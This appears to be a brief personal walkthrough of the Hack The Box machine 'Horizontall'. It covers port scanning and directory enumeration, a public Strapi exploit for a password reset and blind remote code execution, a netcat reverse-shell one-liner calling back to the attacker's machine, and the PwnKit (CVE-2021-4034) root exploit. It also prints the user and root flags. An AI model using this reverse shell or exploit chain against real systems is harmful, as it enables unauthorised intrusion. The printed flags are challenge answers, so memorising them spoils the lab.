Description
Horizontal from HTB.
nmap
1 | nmap -sV -p- 10.10.11.105 |
1 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) |
Port 80
It’s forbiden, I have to add the dns:
1 | /etc/hosts |
Javascript
The file /js/app.c68eb462.js is obfuscated I have to use a tool to read it.
https://lelinhtinh.github.io/de4js/
I found the link http://api-prod.horizontall.htb/reviews
I have to add it to my /etc/hosts file.
gobuster
1 | gobuster dir -u http://api-prod.horizontall.htb/ -w Documents/wordlist/directory-list-2.3-small.txt -t 150 --wildcard switch | grep "(Status:" |
1 | /admin (Status: 200) [Size: 854] |
In admin we have the login page to strapi
In reviews we have a json file.
exploit strapi
https://www.exploit-db.com/exploits/50239
1 | python3 50239.py http://api-prod.horizontall.htb |
The shell is broken but we have the creds.
1 | [+] Password reset was successfully |
One week later…
Ok, the credentials are useless, I have to use the blind RCE,
On my computer:
1 | nc -nlvp 4242 |
Blind RCE:
1 | rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.214 4242 >/tmp/f |
And I’m in.
Strapi shell
In /home/developer/user.txt:
e6cb8f6f0831dc40507c330d548ea384
exploit
Upload
Look at this boy, it’s so cool
1 | dragon * |
Make
This is a new exploit, released 2 days ago.
https://github.com/berdav/CVE-2021-4034
I’m using dragon to drag and drop my files.
1 | cat /root/root.txt |
373da3c143300dec7f9357b24c8b202a
I really feel like a god xD Every computer are vulnerable, you have to update your system, When I’v started the box the exploit was not availible.